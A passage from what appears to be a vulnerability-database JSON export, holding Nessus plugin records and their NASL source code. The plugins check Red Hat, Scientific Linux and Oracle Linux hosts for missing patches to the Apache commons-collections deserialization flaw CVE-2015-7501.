exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2500\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL5\", rpm:\"jbossas-welcome-content-eap\") || rpm_exists(release:\"RHEL6\", rpm:\"jbossas-welcome-content-eap\") || rpm_exists(release:\"RHEL7\", rpm:\"jbossas-welcome-content-eap\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL5\", reference:\"apache-commons-collections-eap6-3.2.1-16.redhat_5.1.ep6.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"apache-commons-collections-eap6-3.2.1-16.redhat_5.1.ep6.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"apache-commons-collections-eap6-3.2.1-16.redhat_5.1.ep6.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections-eap6\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:01", "description": "It was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons- collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons- collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nIn the interim, the quickest way to resolve this specific deserialization vulnerability is to remove the vulnerable class files (InvokerTransformer, InstantiateFactory, and InstantiateTransformer) in all commons-collections jar files. Any manual changes should be tested to avoid unforseen complications.\n\nAll running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : jakarta-commons-collections on SL6.x (noarch) (20151130)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-javadoc", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-tomcat5", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20151130_JAKARTA_COMMONS_COLLECTIONS_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/87121", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87121);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7501\");\n\n script_name(english:\"Scientific Linux Security Update : jakarta-commons-collections on SL6.x (noarch) (20151130)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons- collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-\ncollections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nIn the interim, the quickest way to resolve this specific\ndeserialization vulnerability is to remove the vulnerable class files\n(InvokerTransformer, InstantiateFactory, and InstantiateTransformer)\nin all commons-collections jar files. Any manual changes should be\ntested to avoid unforseen complications.\n\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1511&L=scientific-linux-errata&F=&S=&P=17116\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b1bc1816\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"jakarta-commons-collections-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"jakarta-commons-collections-javadoc-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"jakarta-commons-collections-testframework-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"jakarta-commons-collections-tomcat5-3.2.1-3.5.el6_7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:01", "description": "From Red Hat Security Advisory 2015:2522 :\n\nUpdated apache-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of apache-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-01T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : apache-commons-collections (ELSA-2015-2522)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:apache-commons-collections", "p-cpe:/a:oracle:linux:apache-commons-collections-javadoc", "p-cpe:/a:oracle:linux:apache-commons-collections-testframework", "p-cpe:/a:oracle:linux:apache-commons-collections-testframework-javadoc", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2015-2522.NASL", "href": "https://www.tenable.com/plugins/nessus/87119", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:2522 and \n# Oracle Linux Security Advisory ELSA-2015-2522 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87119);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2522\");\n\n script_name(english:\"Oracle Linux 7 : apache-commons-collections (ELSA-2015-2522)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:2522 :\n\nUpdated apache-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Apache Commons Collections library provides new interfaces,\nimplementations, and utilities to extend the features of the Java\nCollections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of apache-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-November/005594.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache-commons-collections packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apache-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apache-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apache-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:apache-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"apache-commons-collections-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"apache-commons-collections-javadoc-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"apache-commons-collections-testframework-3.2.1-22.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"apache-commons-collections-testframework-javadoc-3.2.1-22.el7_2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections / apache-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:18:06", "description": "Updated jakarta-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-11-30T00:00:00", "type": "nessus", "title": "RHEL 6 : jakarta-commons-collections (RHSA-2015:2521)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-javadoc", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-tomcat5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.7"], "id": "REDHAT-RHSA-2015-2521.NASL", "href": "https://www.tenable.com/plugins/nessus/87102", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2521. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87102);\n script_version(\"2.19\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2521\");\n\n script_name(english:\"RHEL 6 : jakarta-commons-collections (RHSA-2015:2521)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated jakarta-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new\ninterfaces, implementations, and utilities to extend the features of\nthe Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/solutions/2045023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2521\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7501\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2521\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"jakarta-commons-collections-3.2.1-3.5.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"jakarta-commons-collections-javadoc-3.2.1-3.5.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"jakarta-commons-collections-testframework-3.2.1-3.5.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2.1-3.5.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"jakarta-commons-collections-tomcat5-3.2.1-3.5.el6_7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-javadoc / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:43", "description": "From Red Hat Security Advisory 2015:2521 :\n\nUpdated jakarta-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-01T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : jakarta-commons-collections (ELSA-2015-2521)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:jakarta-commons-collections", "p-cpe:/a:oracle:linux:jakarta-commons-collections-javadoc", "p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework", "p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:oracle:linux:jakarta-commons-collections-tomcat5", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2015-2521.NASL", "href": "https://www.tenable.com/plugins/nessus/87118", 